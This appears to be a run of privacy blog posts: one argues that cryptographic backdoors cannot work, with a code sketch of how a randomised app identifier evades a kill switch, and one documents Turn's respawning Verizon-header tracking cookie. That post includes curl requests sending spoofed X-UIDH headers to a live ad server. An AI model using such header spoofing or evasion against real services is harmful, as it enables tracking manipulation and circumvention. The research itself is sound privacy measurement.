Cryptographic backdoors are a bad idea. They introduce unquantifiable security risks, like the recent FREAK vulnerability. They could equip oppressive governments, not just the United States. They chill free speech. They impose costs on innovators and reduce foreign demand for American products. The list of objections runs long.

I’d like to articulate an additional, pragmatic argument against backdoors. It’s a little subtle, and it cuts across technology, policy, and law. Once you see it, though, you can’t unsee it.

Cryptographic backdoors will not work. As a matter of technology, they are deeply incompatible with modern software platforms. And as a matter of policy and law, addressing those incompatibilities would require intolerable regulation of the technology sector. Any attempt to mandate backdoors will merely escalate an arms race, where usable and secure software stays a step ahead of the government.

The easiest way to understand the argument is to walk through a hypothetical. I’m going to use Android; much of the same analysis would apply to iOS or any other mobile platform.

An Android Hypothetical

Imagine that Google rolls over and backdoors Android. For purposes of this post, the specifics of the backdoor architecture don’t matter. (My recent conversations with federal policymakers have emphasized key escrow designs, and the Washington Post’s reporting is consistent.) Google follows the law, and it compromises Android’s disk encryption.

But there’s an immediate problem: what about third-party apps? Android is, by design, a platform. Google has deliberately made it trivial to create, distribute, and use new software. What prevents a developer from building their own secure data store on top of Android’s backdoored storage? What prevents a developer from building their own end-to-end secure messaging app?

The obvious answer is that Google can’t stop with just backdooring disk encryption. It has to backdoor the entire Android cryptography library. Whenever a third-party app generates an encrypted blob of data, for any purpose, that blob has to include a backdoor.

Now there’s another problem: what about third-party apps that don’t rely on the Android cryptography library? It’s already common practice to use alternatives. Maybe the government could require some commercial libraries, like Facebook Conceal, to incorporate backdoors. Federal authorities certainly won’t be able to reach free, open source, international¹ libraries, like OpenSSL, NaCl, or Bouncy Castle. The jurisdictional obstacles to regulation are insurmountable. What’s more, there would be serious First Amendment issues, since a cryptography library is largely math (i.e. speech).

So, how can the government make sure that Android apps use only backdoored libraries? Direct regulation of app developers wouldn’t be enough, since many developers are outside the reach of the American legal system. And, if Google wanted, it could allow developers to submit apps anonymously.²

The solution would have to be intermediary liability, where Google is compelled to play gatekeeper.

One option: require Google to police its app store for strong cryptography. Another option: mandate a notice-and-takedown system, where the government is responsible for spotting secure apps, and Google has a grace period to remove them. Either alternative would, of course, be entirely unacceptable to the technology sector—the DMCA’s notice-and-takedown system is widely reviled, and present federal law (CDA 230) disfavors intermediary liability.

This hypothetical is already beyond the realm of political feasibility, but keep going. Assume the federal government sticks Google with intermediary liability. How will Google (or the government) distinguish between apps that have strong cryptography and apps that have backdoored cryptography?

There isn’t a good solution. Auditing app installation bundles, or even requiring developers to hand over source code, would not be sufficient. Apps can trivially download and incorporate new code. Auditing running apps would add even more complexity. And, at any rate, both static and dynamic analysis are unsolved challenges—just look at how much trouble Google has had identifying malware and knockoff apps.

Continue with the hypothetical, though. Imagine that Google could successfully banish secure encryption apps from the official Google Play store. What about apps that are loaded from another app store? The government could feasibly regulate some competitors, like the Amazon Appstore. How, though, would it reach international, free, open source app repositories like F-Droid or Fossdroid? What about apps that a user directly downloads and installs (“sideloads”) from a developer’s website?

The only solution is an app kill switch.³ (Google’s euphemism is “Remote Application Removal.”) Whenever the government discovers a strong encryption app, it would compel Google to nuke the app from Android phones worldwide. That level of government intrusion—reaching into personal devices to remove security software—certainly would not be well received. It raises serious Fourth Amendment issues, since it could be construed as a search of the device or a seizure of device functionality and app data.⁴ What’s more, the collateral damage would be extensive; innocent users of the app would lose their data.

Designing an effective app kill switch also isn’t so easy. The concept is feasible for app store downloads, since those apps are tagged with a consistent identifier. But a naïve kill switch design is trivial to circumvent with a sideloaded app. The developer could easily generate a random application identifier for each download.⁵
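To make the circumvention concrete, here is a minimal Python sketch of an identifier-based kill switch and a sideloaded app that evades it. Everything in it is an assumption for illustration: the function names, the `com.example` identifiers, and the idea that the kill switch is a simple blocklist lookup. It is not a description of how Google's Remote Application Removal actually works.

```python
import uuid


def naive_kill_switch(installed_app_ids, blocklist):
    """Return the installed identifiers that a blocklist-based kill switch would remove."""
    return [app_id for app_id in installed_app_ids if app_id in blocklist]


def randomized_app_id(prefix="com.example.app"):
    """Hypothetical per-download identifier: a fixed prefix plus a random suffix."""
    # The leading "x" keeps the final segment starting with a letter.
    return f"{prefix}.x{uuid.uuid4().hex}"


# The government flags one identifier; the app store copy uses exactly that identifier.
blocklist = {"com.example.securechat"}
store_install = "com.example.securechat"

# The sideloaded copy gets a fresh identifier for every download.
sideloaded_install = randomized_app_id()

removed = naive_kill_switch([store_install, sideloaded_install], blocklist)
print(removed)  # only the app store copy matches the blocklist
```

The app store copy is caught because its identifier never changes. The sideloaded copy has an identifier nobody has seen before, so there is nothing for the blocklist to match.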

Google would have to build a much more sophisticated kill switch, scanning apps for prohibited traits. Think antivirus, but for detecting and removing apps that the user wants. That’s yet another unsolved technical challenge, yet another objectionable intrusion into personal devices, and yet another practice with constitutional vulnerability.

Stick with the hypothetical, and assume the app kill switch works.⁶ Secure native apps are gone.

What about browser-based apps? It’s possible to build a secure data store or messaging app that loads entirely over the web, from the user interface to the cryptography library, and gets saved on the user’s device. The requisite web standards are already in place. This is not a good engineering design, to be clear—it should only be a last resort—but it is possible. And it circumvents the Android cryptography library, Google Play restrictions, and the app kill switch.

That leaves just one option.⁷ In order to prevent secure data storage and end-to-end secure messaging, the government would have to block these web apps. The United States would have to engage in Internet censorship.

Are Criminals Really That Smart?

It’s easy to spot the leading counterargument to this entire line of reasoning. I’ve heard it firsthand from both law enforcement and intelligence officials.

“Sure,” the response goes, “it’s impossible to entirely block secure apps. Sophisticated criminals will always have good operational security. But we don’t need complete backdoor coverage. If we can significantly increase the barriers to secure storage and messaging, that’s still a big win. Most criminals really aren’t so smart.”

That response isn’t convincing. We’re already talking about the smart criminals here.⁸ Android and iOS continue to allow for government access to data by default.

In order to believe that backdoors will work,⁹ we have to believe there is a set of criminals who are smart enough to do all of the following:

Disable default device backups to the cloud. Otherwise, the government can obtain device content directly from the cloud provider.
Disable default device key backups to the cloud, if the government retrieves the device. Otherwise, the government can obtain the key from the cloud, and decrypt the device.
Disable default device biometric decryption, if the government retrieves the device and detains its owner. Otherwise, the government can compel the owner to decrypt the device.
Avoid sending incriminating evidence by text message, email, or any other communications system that isn’t end-to-end secure. Otherwise, the government can prospectively intercept messages, and can often obtain past communications.
Disable default cloud storage for each app that contains incriminating evidence, such as a photo library. Otherwise, the government can obtain the evidence directly from the cloud provider.

That’s quite a tall order. And yet, these same criminals must not be smart enough to do any of the following:

Install an alternative storage or messaging app.
Download an app from a website instead of an official app store.
Use a web-based app instead of a native mobile app.

It’s difficult to believe that many criminals would fit the profile.

Will These Apps Really Get Built?

There’s a slightly different counterargument that I’ve also heard. It’s less common, and it focuses on app developers rather than criminals.

“Sure,” the thinking runs, “it’s impossible to entirely block secure apps. But we don’t need a complete technology ban. We just need to disincentivize building these apps, by making them more difficult to design, distribute, and monetize. The best developers will walk away, and the best secure apps will disappear. That would still be a big win.”

Not so fast. Many secure software developers aren’t incentivized by financial reward. In fact, much of the best secure software is free, open source, and noncommercial. And for those developers who do wish to monetize, there are a plethora of viable options.¹⁰

As for app design and distribution, that was the discussion earlier. Unless the government is prepared to adopt technology sector regulation that is politically infeasible, inconsistent with prior policy, and possibly unconstitutional, it just can’t do much to obstruct secure apps.

Concluding Thoughts

The frustration felt by law enforcement and intelligence officials is palpable and understandable. Electronic surveillance has revolutionized both fields, and it plays a legitimate role in both investigating crimes and protecting national security. The possibility of losing critical evidence, even if rare, should be cause for reflection.

Cryptographic backdoors are, however, not a solution. Beyond the myriad other objections, they pose too much of a cost-benefit asymmetry. In order to make secure apps just slightly more difficult for criminals to obtain, and just slightly less worthwhile for developers, the government would have to go to extraordinary lengths. In an arms race between cryptographic backdoors and secure apps, the United States would inevitably lose.

Image credits: door, lock, Android bouncer, and Android app kill switch.

1. By international, I mean a project that has international contributors and could easily be coordinated from a foreign location.

2. Google could, for instance, implement a system like SecureDrop for app submissions. I don’t expect that it’s likely, but it is feasible. The government counter-move would be to require Google to adopt a real-name policy for app submissions. Given how critical the United States has been of foreign governments that have imposed similar policies (e.g. China), that seems even more unlikely.

3. I suppose another direction would be to entirely forbid alternative app stores and sideloaded apps. Unless the federal government is prepared to kibosh open platforms, and to require that Android be a walled garden like iOS, that’s even more of a non-starter.

4. There could also be a Fifth Amendment (takings) or Second Amendment (self-defense) challenge. I don’t think the caselaw supports the former, though, and there isn’t yet much caselaw on the latter.

5. Alternatively, the user could be directed to compile the app for themselves with Google’s free Android development kit.

6. Another circumvention of the kill switch, albeit one that’s somewhat more challenging for users, is installing a variant of Android. The popular CyanogenMod operating system, for instance, has particularly good privacy and security features. It likely wouldn’t honor government cryptography takedown requests. The only solution: lock Android users into the pre-installed operating system. That won’t sit well with tinkerers, to be sure. And it puts users at risk—device vendors and carriers are notoriously slow to push out Android updates, so variants of Android can be a more secure alternative.

7. The government could, alternatively, demand an ability to remotely observe device usage. At that point, though, the conversation is much more about government hacking than cryptographic backdoors.

8. There is, presumably, a small subset of not-so-smart criminals who stumble into a secure configuration. The behavioral economics work in computer security and privacy has consistently found that defaults dictate outcomes. There’s even some (indirect) empirical evidence that the overwhelming majority of iOS users have backups enabled, since the overwhelming majority of iOS users quickly receive major OS updates.

9. The absence of a backdoor could slightly delay prospective government access to data. In order to intercept future iMessages, for instance, the government would have to wait until the target’s iPhone backed up to iCloud. That seems a minute investigative burden, and at any rate, law enforcement agencies rarely engage in prospective content interception. (It necessitates a wiretap order, which goes far beyond the requirements of an ordinary warrant.)

10. A range of advertising models come to mind. Just look at the booming ecosystem of questionable “file locker” websites.

The Turn-Verizon Zombie Cookie

jonathan — Wed, 14 Jan 2015 20:26:55 +0000

Verizon Wireless injects a unique header into customer web traffic. When the practice came to light last year, it was widely panned. Numerous security researchers pointed out that this “supercookie” could trivially be used to track mobile subscribers, even if they had opted out, cleared their cookies, or entered private browsing mode.¹ But Verizon persisted, emphasizing that its own business model did not use the header for tracking.

Out of curiosity, I went looking for a company that was taking advantage of the Verizon header to track consumers. I found one—Turn, a headline Verizon advertising partner. They’re “bringing sexy back to measurement.”

Warning Signs

There are, roughly, two ways that a website could track a user with the Verizon header. The sneaky way is to surreptitiously correlate values on the backend. Detecting that is quite tricky. (Though there’s been impressive research progress in the past couple years.)

The ~~brazen~~ ~~lazy~~ transparent way is to bolt the header onto existing cookie tracking. If a user’s ID cookie is missing, simply reconstruct it from their Verizon header. In the rich jargon of online privacy, these are dubbed “zombie cookies.” They rise from the grave.²

In late December, I went Verizon zombie hunting. I began by developing a basic web crawler with PhantomJS. It visited popular websites, clearing cookies after each page. On the first run, it spoofed a Verizon advertising header.³ On the second run, it used a vanilla configuration. A post-processing script then scanned for lengthy cookie values that recurred only in the Verizon crawl.
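The post-processing step can be sketched roughly as follows. This is a minimal Python illustration, not the script used for the crawl. The record layout (page, cookie domain, cookie name, cookie value), the `min_length` and `min_pages` thresholds, and the `.example` hosts in the sample data are all assumptions; only the turn.com values are taken from this post.

```python
from collections import defaultdict


def pages_by_value(records, min_length=10):
    """Map (domain, name, value) -> set of pages where that lengthy cookie value appeared."""
    pages = defaultdict(set)
    for page, domain, name, value in records:
        if len(value) >= min_length:
            pages[(domain, name, value)].add(page)
    return pages


def zombie_candidates(verizon_records, vanilla_records, min_length=10, min_pages=2):
    """Lengthy cookie values that recur across pages only in the header-spoofing crawl."""
    with_header = pages_by_value(verizon_records, min_length)
    without_header = pages_by_value(vanilla_records, min_length)
    # Values that also recur without the header are constants, not respawned IDs.
    vanilla_recurring = {k for k, p in without_header.items() if len(p) >= min_pages}
    return {
        key: sorted(pages)
        for key, pages in with_header.items()
        if len(pages) >= min_pages and key not in vanilla_recurring
    }


# Cookies were cleared after every page, so a unique value should never repeat.
verizon_crawl = [
    ("a.example", ".turn.com", "uid", "4012847891611109688"),
    ("b.example", ".turn.com", "uid", "4012847891611109688"),
    ("a.example", ".tracker.example", "id", "1111111111111111"),
    ("b.example", ".tracker.example", "id", "2222222222222222"),
    ("a.example", ".cdn.example", "version", "static-build-2015"),
    ("b.example", ".cdn.example", "version", "static-build-2015"),
]
vanilla_crawl = [
    ("a.example", ".turn.com", "uid", "2415230717135370700"),
    ("b.example", ".turn.com", "uid", "4425321986559530189"),
    ("a.example", ".cdn.example", "version", "static-build-2015"),
    ("b.example", ".cdn.example", "version", "static-build-2015"),
]

candidates = zombie_candidates(verizon_crawl, vanilla_crawl)
print(candidates)
```

Comparing against the vanilla crawl matters: without it, any long constant (a version string, say) would look like a respawned ID.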

The uid cookie on turn.com immediately appeared suspicious. The same unique value was restored on over a hundred pages.

Undead Cookies

Confirmation was easy. A request to certain Turn resources, sans Verizon header, simply drops a uid cookie.

$ curl -D - "http://ad.turn.com/server/ads.js"
...
Set-Cookie: uid=2415230717135370700; Domain=.turn.com; ...

Each cookieless request results in a new ID.

$ curl -D - "http://ad.turn.com/server/ads.js"
...
Set-Cookie: uid=4425321986559530189; Domain=.turn.com; ...

So far, no surprises. When requests include a Verizon header, though, the subsequent response behavior is different.

$ curl -H "X-UIDH: OTgxNT..." -D - "http://ad.turn.com/server/ads.js"
...
Set-Cookie: uid=4012847891611109688; Domain=.turn.com;...

$ curl -H "X-UIDH: OTgxNT..." -D - "http://ad.turn.com/server/ads.js"
...
Set-Cookie: uid=2539356028667362074; Domain=.turn.com;...
Set-Cookie: uid=4012847891611109688; Domain=.turn.com;...

As before, there’s a new ID. But a second Set-Cookie header appears; it trumps the first header and restores the old ID.⁴
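A simplified Python sketch shows why the second header wins. It assumes a client that applies Set-Cookie headers in the order received and keys cookies by name alone; real browsers also match on domain and path, and the function name here is made up for illustration.

```python
def apply_set_cookie_headers(jar, headers):
    """Apply Set-Cookie header values in order; a later cookie with the same
    name replaces an earlier one (domain and path are ignored in this sketch)."""
    for header in headers:
        name_value = header.split(";", 1)[0]        # drop attributes such as Domain
        name, _, value = name_value.partition("=")
        jar[name.strip()] = value.strip()
    return jar


jar = apply_set_cookie_headers({}, [
    "uid=2539356028667362074; Domain=.turn.com",  # the fresh ID
    "uid=4012847891611109688; Domain=.turn.com",  # the old ID, sent second
])
print(jar)  # {'uid': '4012847891611109688'}
```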

Turn does not seem to validate the Verizon header. Sending a totally bogus value, for instance, still results in a zombie cookie.

$ curl -H "X-UIDH: totallybogus" -D - "http://ad.turn.com/server/ads.js"
...
Set-Cookie: uid=8323135681340417635; Domain=.turn.com;...

$ curl -H "X-UIDH: totallybogus" -D - "http://ad.turn.com/server/ads.js"
...
Set-Cookie: uid=3259412905334729433; Domain=.turn.com;...
Set-Cookie: uid=8323135681340417635; Domain=.turn.com;...

The respawning logic also appears to be naïve. It seems to simply replay the latest ID value associated with the header.⁵

$ curl -H "X-UIDH: fake" -H "Cookie: uid=123456789" -D - "http://ad.turn.com/server/ads.js"
...
Set-Cookie: uid=123456789; Domain=.turn.com;...

$ curl -H "X-UIDH: fake" -D - "http://ad.turn.com/server/ads.js"
...
Set-Cookie: uid=3647115064319153191; Domain=.turn.com;...
Set-Cookie: uid=123456789; Domain=.turn.com;...
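The replay behavior in these transcripts can be captured in a toy Python model. To be clear, this is a guess that happens to reproduce the curl output above, not Turn's actual implementation (footnote 5 notes that the real mechanism looks more convoluted). The class name, the in-memory dictionary, and the handling of requests that carry a cookie but no header are all assumptions.

```python
import secrets


class ToyRespawner:
    """Toy model of the observed behavior; not Turn's actual implementation."""

    def __init__(self):
        self.latest_uid = {}  # X-UIDH header value -> most recent uid seen with it

    def respond(self, uidh=None, cookie_uid=None):
        """Return the uid values that would be sent in Set-Cookie headers, in order."""
        if cookie_uid is not None:
            # Existing cookie: echo it back and remember it for this header.
            if uidh is not None:
                self.latest_uid[uidh] = cookie_uid
            return [cookie_uid]
        fresh = str(secrets.randbelow(2**63))
        if uidh is None:
            return [fresh]
        if uidh in self.latest_uid:
            # Cookieless request with a known header: the old ID follows the
            # fresh one, so the old ID is the one a browser ends up keeping.
            return [fresh, self.latest_uid[uidh]]
        self.latest_uid[uidh] = fresh
        return [fresh]


server = ToyRespawner()
first = server.respond(uidh="fake", cookie_uid="123456789")
second = server.respond(uidh="fake")
print(first)   # ['123456789']
print(second)  # a fresh random ID, then '123456789'
```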

I tried moving between IP addresses and User-Agents, in case those factored into Turn’s behavior. The zombie cookie remained.

Because of implementation quirks, the zombie cookie might not always stick.⁶ But the basic design and effect are straightforward.

Cookie Contagion

The privacy impact does not, unfortunately, end with Turn. Over the past five years, the online advertising market has shifted from monolithic advertising networks to fragmented advertising exchanges. A technical consequence is that advertising firms routinely swap ID values. In industry lingo, it’s called “cookie syncing.”

In my crawl, Turn’s zombie cookie was sent to or from over thirty other businesses.⁷ They included Google, Facebook, Yahoo, Twitter, Walmart, and WebMD. How those firms use Turn’s ID, I can’t say—it’s entirely possible that some unknowingly tracked users with a zombie value. They certainly possessed sufficient information.⁸ It’s especially likely for businesses that dropped their own tracking cookie with Turn’s ID.⁹
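A check along these lines (see footnote 7) can be sketched in a few lines of Python. This is an illustration under assumptions, not the script behind the results: the request-log layout (dictionaries with `url`, `referrer`, and `cookie` keys), the function name, and the `.example` hosts are invented. It also only covers the "sent to" direction, where the zombie value reaches a host other than Turn.

```python
from urllib.parse import urlsplit


def hosts_seeing_value(requests, value, first_party_suffix="turn.com"):
    """Hosts outside `first_party_suffix` whose requests carried `value`
    in the URL, the Referer header, or a cookie."""
    hosts = set()
    for req in requests:
        host = urlsplit(req["url"]).hostname or ""
        if host == first_party_suffix or host.endswith("." + first_party_suffix):
            continue  # Turn seeing its own ID is expected
        haystacks = [req["url"], req.get("referrer", ""), req.get("cookie", "")]
        if any(value in h for h in haystacks):
            hosts.add(host)
    return sorted(hosts)


sample_requests = [
    {"url": "http://ad.turn.com/server/ads.js",
     "cookie": "uid=4012847891611109688"},
    {"url": "http://sync.partner.example/match?turn_uid=4012847891611109688",
     "referrer": "http://news.example/"},
    {"url": "http://pixel.other.example/p.gif",
     "referrer": "http://ad.turn.com/r/cs?uid=4012847891611109688"},
    {"url": "http://static.unrelated.example/logo.png"},
]

print(hosts_seeing_value(sample_requests, "4012847891611109688"))
# ['pixel.other.example', 'sync.partner.example']
```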

The privacy impact also goes beyond individual mobile browsers. If a Verizon customer tethered with their phone, their notebook could get stuck with the zombie value. (The ultimate in cross-device advertising!) And the zombie value could spread between cookie stores on a device, including between the web browser and individual apps. (The ultimate in inter-app advertising!)

In sum, there are widespread collateral consequences from Turn’s zombie cookie.

No Escape

If a Verizon Wireless subscriber objects to Turn’s tracking, what’s their recourse? Well, both Verizon and Turn offer opt outs. You might think those would be effective. You would think wrong.

Verizon provides two separate privacy choices related to the header: “Relevant Mobile Advertising” and “Verizon Selects.” Steven Englehardt has compiled a convenient comparison of these programs.¹⁰

The accounts that I tested had both Relevant Mobile Advertising and Verizon Selects disabled, as well as every other controllable form of Verizon information sharing. Turn’s zombie cookies kept coming back.

These preferences don’t actually stop Verizon from injecting a unique advertising header. They merely stop Verizon from passing along additional customer information. If a business is using the header as a tracking identifier—like Turn is—the Verizon preferences are entirely ineffective.

Turn’s privacy option also fails to prevent its zombie cookies. I checked by opting out on Turn’s website,¹¹ a process that drops an optOut=1 cookie and expires ID cookies.¹²

I then cleared browser state and visited websites where Turn’s zombie cookie had previously respawned. The uid tracking cookie came back.

What’s more, the optOut cookie—which is supposed to prevent behavioral ad targeting—did not get resurrected. According to Turn’s own status check, the user’s preference against behavioral advertising was gone.

Status checks for advertising self-regulatory programs confirmed that Turn would use its tracking data for behavioral advertising.¹³

So, what’s a Verizon subscriber to do? Ad blocking would be effective, but it isn’t supported by the stock Android or iOS browsers. Using a VPN or other secure proxy would work, though that’s quite cumbersome. For an ordinary user, there simply is no defense.

Are These Zombies Legal?

Commercial supercookies, fingerprinting, and zombie cookies are tolerated (if not permitted) under current United States law.¹⁷ Any associated consumer deception, however, is a violation of the Federal Trade Commission Act and parallel state statutes.

I think a consumer deception claim would succeed against Turn. One theory is deception by omission: Turn failed to disclose its zombie cookie practice. Turn’s privacy policy speaks volumes about cookies, but says nothing about the Verizon header.

This isn’t a novel legal theory. The FTC previously used it against Epic Marketplace, for failing to disclose a non-cookie tracking technology. (That case was based on a prior project.) Even an advertising industry self-regulatory body acknowledged that non-cookie tracking requires special notice.

Another viable theory against Turn is that its opt-out mechanism is deceptive. The advertising industry’s self-regulatory guidelines say this:

The technologies that members use for [behavioral advertising] purposes must provide users with an appropriate degree of transparency and control.

It’s weak language, to be sure. Ordinarily, the “appropriate” control is opt-out, difficult to find, implemented as a flimsy cookie, and limited to ad targeting (not tracking!).

In the context of non-cookie tracking technologies, though, the text does have a little bite. A company can use a tracking mechanism that is stickier than a cookie. But for the “control” to be “appropriate,” it must be at least as sticky as the tracking. That’s not just a sensible interpretation—that’s the advertising industry’s own interpretation.

Companies must also ensure that their [behavioral advertising] opt-out mechanism provides consumers with real choice, which may require linking their back-end technologies to existing opt-out mechanisms so that they will function seamlessly no matter what technology is being employed.

As noted above, Turn does not link its Verizon header tracking to a consumer’s opt-out choice.
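For contrast, here is a hypothetical Python sketch of what "linking" could look like: the opt-out is stored against the same header that keys the tracking ID, so the preference is as sticky as the tracking. Nothing here reflects any real system; the class, its methods, and the storage model are assumptions made up to illustrate the guideline.

```python
class OptOutAwareBackend:
    """Hypothetical backend where the opt-out is keyed to the same header as the ID."""

    def __init__(self):
        self.uid_by_header = {}
        self.opted_out_headers = set()

    def record_opt_out(self, uidh):
        """Remember the preference server-side and forget any ID tied to this header."""
        self.opted_out_headers.add(uidh)
        self.uid_by_header.pop(uidh, None)

    def cookies_to_set(self, uidh, fresh_uid):
        """Cookies for a cookieless request that arrives with header `uidh`."""
        if uidh in self.opted_out_headers:
            # Restore the preference, not the tracking ID.
            return {"optOut": "1"}
        uid = self.uid_by_header.setdefault(uidh, fresh_uid)
        return {"uid": uid}


backend = OptOutAwareBackend()
before = backend.cookies_to_set("OTgxNT...", "111")  # {'uid': '111'}
backend.record_opt_out("OTgxNT...")
after = backend.cookies_to_set("OTgxNT...", "222")   # {'optOut': '1'}
print(before, after)
```

In this design, clearing cookies after opting out brings back the opt-out cookie rather than the uid cookie, which is the reverse of what I observed.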

Are These Headers Legal?

The ideal enforcement target is, of course, Verizon. They started this whole header mess, and they can finish it. Others have previously argued that the unique header violates telecom customer privacy obligations. That might be.¹⁴

Given Turn’s zombie cookie practice, I think there’s also a good FCC, FTC, or state deception case against Verizon.¹⁵ The company has consistently misrepresented the privacy properties of its header, and especially the impact of its opt-out preferences.

In its explanation of the advertising header, Verizon says:

It is unlikely that sites and ad entities will attempt to build customer profiles for online advertising or any other purpose using the [header] . . . .

Security researchers disagreed. We were right.

For ad tech entities that have a presence on many websites, the [header] does not provide any information beyond . . . other already existing IDs.

False. The header enables more persistent tracking than other technologies, especially on mobile platforms.¹⁶

When a customer opts out of [Verizon advertising programs] the [header] cannot be used for advertising purposes because there is no information associated with it available to our ad partners.

Also false. Turn is using the header for ad tracking, and Verizon’s opt-out preferences do not alter Turn’s practices. This is precisely the scenario that security researchers warned about.

When a customer opts out, our partners receive no information, anonymized or otherwise, about those customers.

Again, false. Turn is a partner. And it’s receiving some information about the customer—a persistent unique identifier.

Since the [header] was implemented in 2012, we are not aware of any uses of the [header] other than the intended uses we have described here.

Might want to change that.

Verizon’s statements to the press are also inaccurate. Wired:

According to Verizon spokeswoman Debra Lewis . . . if you opt out of the company’s [header advertising program], then Verizon and its advertising partners won’t be using [the header] to create targeted ads.

Nope. CIO (and customer support):

Verizon spokeswoman Debra Lewis says . . . “If/when a customer opts out . . . there is NO information associated with the ID and therefore, no ability to use it for advertising purposes.”

Negative. Washington Post:

A company spokeswoman, Adria Tomaszewski, said . . . those who are not part of the Verizon advertising program . . . are not able to use the supercookie to track Verizon customers.

“The way it’s built, it wouldn’t be able to be used for that,” Tomaszewski said.

You get the idea.

Concluding Thoughts

Internet service providers are in a trusted position. They can arbitrarily observe and tamper with all of a customer’s traffic. What’s more, in the wireless space, carriers can exert control over a customer’s devices.

When ISPs have breached that trust to snoop on subscribers, they’ve landed in trouble. Debacles involving NebuAd, Phorm, and Carrier IQ come to mind. The reasons are evident: consumers have limited information, limited choice, and limited control.

Advertising headers are no different. AT&T has already yanked its program; it’s past time for Verizon to do the same.

Sometimes I write (shorter) stuff at @jonathanmayer.

I owe a debt of gratitude to Steven Englehardt, Arvind Narayanan, Jacob Hoffman-Andrews, and other friends and colleagues who contributed to this work. All views and errors are solely my own.

The graphics in this post remix resources that are Creative Commons licensed.

1. The only viable defense against the Verizon header is securing all traffic through Verizon’s network, e.g. with a VPN.

2. Researchers have previously spotted zombie cookies using Flash LSOs, HTML5 storage, HTTP ETags, and other tracking technologies. John Mitchell and I wrote a survey paper a few years ago synthesizing possibilities.

3. Specifically, I used my own header value from October.

4. Some Turn resources were a little more subtle, responding with just the old ID value. For instance:

$ curl -H "X-UIDH: OTgxNT..." -D - "http://d.turn.com/r/du/"
...
Set-Cookie: uid=4012847891611109688; Domain=.turn.com;...

5. In my crawls, I saw more than one ID value get respawned. That suggests that Turn’s mechanism for associating an ID with an X-UIDH header is more convoluted than merely storing and replaying a single value.

Also, I tried testing with an older and newer Verizon header for the same device. They received different ID values, suggesting Turn is treating the header as an opaque identifier.

I should note that Turn’s implementation allows a website to steal a user’s uid value. That could, potentially, allow an adversary to learn coarse information about the user’s browsing activity (e.g. based on ads displayed).

6. Not all Turn resources receive the Verizon header (e.g. those loaded over HTTPS or over a non-Verizon network). Also, not all Turn resources respawn cookies. An example:

$ curl -H "X-UIDH: OTgxNT..." -D - "http://ad.turn.com/r/cs"
...
Set-Cookie: uid=4375890934513601832; Domain=.turn.com;...

If the browser does not have a uid cookie, and some of these resources are also embedded, a race condition arises between HTTP transactions. The browser can thrash between new and old cookie values, depending on request and response timing. In my testing, a zombie cookie was the most common end state.
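The thrashing can be sketched in a few lines of Python. This is a simplified illustration, not a model of any real browser's cookie jar: the function name `final_uid` is hypothetical, and the only assumption is that a later `Set-Cookie` for the same name and domain overwrites an earlier one. The two header values are the visible portions of the responses shown in notes 4 and 6.

```python
from http.cookies import SimpleCookie

def final_uid(set_cookie_headers):
    """Return the uid left in a simplified cookie jar after applying
    Set-Cookie headers in the order their responses arrive."""
    jar = {}
    for header in set_cookie_headers:
        parsed = SimpleCookie()
        parsed.load(header)
        for name, morsel in parsed.items():
            # Assumption: a later response overwrites an earlier one.
            jar[name] = morsel.value
    return jar.get("uid")

# Visible parts of the headers from notes 4 and 6 (the rest is elided there).
RESPAWNED = "uid=4012847891611109688; Domain=.turn.com"  # old (zombie) value
OTHER = "uid=4375890934513601832; Domain=.turn.com"      # non-respawning resource

# Same two responses, different arrival order, different end state.
zombie_wins = final_uid([OTHER, RESPAWNED])
other_wins = final_uid([RESPAWNED, OTHER])
```

Whichever response lands last determines the cookie the browser keeps, which is why the end state depends on timing.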

7. A post-processing script checked URLs, referrers, and cookies for the zombie value. The results are available in a spreadsheet. Based on Turn’s partner APIs, as well as observations from Steven Englehardt, it appears other companies may have received the zombie value.
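For readers who want to replicate that kind of check, here is a minimal sketch of what such a post-processing pass could look like. It is not the script used for this post: the record layout (dicts with `url`, `referrer`, and `cookies` strings), the function name, and the example hosts are all hypothetical.

```python
from urllib.parse import unquote

def find_zombie_sightings(requests, zombie_value):
    """Return (request URL, field name) pairs where the zombie ID appears.

    `requests` is assumed to be an iterable of dicts with optional string
    fields "url", "referrer", and "cookies" (a hypothetical crawl log format).
    """
    sightings = []
    for req in requests:
        for field in ("url", "referrer", "cookies"):
            text = req.get(field, "")
            # Percent-decode so an ID embedded in an encoded URL is still found.
            if zombie_value in unquote(text):
                sightings.append((req.get("url", ""), field))
    return sightings

# Made-up crawl records for illustration only.
sample = [
    {"url": "http://tracker.example/sync?id=4012847891611109688",
     "referrer": "http://news.example/", "cookies": ""},
    {"url": "http://cdn.example/lib.js",
     "referrer": "http://news.example/", "cookies": "session=abc"},
    {"url": "http://ads.example/pixel",
     "referrer": "", "cookies": "uid=4012847891611109688"},
]
hits = find_zombie_sightings(sample, "4012847891611109688")
```

A plain substring match like this can miss IDs that a partner hashes or re-encodes, so it gives a lower bound on where the value travels.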

8. The Verizon header itself, of course, is sufficient information for persistent tracking. The header rotates periodically, however, making Turn’s zombie cookies more robust.

9. Assuming these firms keep HTTP request logs with cookie values, they’d have a zombie IDed database of user web browsing activity.

10. My understanding is the same as Steve’s. Relevant Mobile Advertising is an opt-out program that facilitates demographic and consumer profile targeting. It may also incorporate some behavioral targeting; Verizon’s language is ambiguous. Verizon Selects is a compensated opt-in program; it covers location-based and behavioral targeting.

11. A similar process is available on industry self-regulatory websites.

12. The uid value can subsequently respawn or be reassigned, before the user has cleared their cookies.

13. It’s possible that Turn has an opt-out preference stored on its backend, tied to an X-UIDH header or uid cookie value. The technical evidence suggests otherwise—that would render the optOut cookie entirely redundant and mean all three status checking mechanisms are broken. The definitive answer is in Turn’s backend which, of course, I can’t audit.

14. To my knowledge, no regulatory agency has yet challenged one of these practices as inherently “unfair” or “deceptive” in violation of consumer protection law.

15. One theory is that the header constitutes an unauthorized disclosure of “customer proprietary network information” (CPNI) under Section 222(c) of the Communications Act. Another basis for liability is that the header is “proprietary information” under Section 222(a), a new theory articulated by the FCC in a recent data breach case.

16. In this area, the Federal Communications Commission, the Federal Trade Commission, and the state attorneys general have concurrent authority. The FCC’s deception authority would stem from the Open Internet Order or Section 201 of the Communications Act.

17. According to several journalists, Verizon is keen to compare the header to Apple’s Advertising Identifier on iOS. That ID, while problematic, does have more favorable privacy properties. It isn’t accessible from the browser, users can forcibly change it, there’s an associated privacy signaling mechanism (“Limit Ad Tracking”), and all app developers are bound by enforceable conditions on using it.

In NSA Appeals, DOJ Misleads About Medical and Financial Records

jonathan — Thu, 11 Dec 2014 20:53:49 +0000

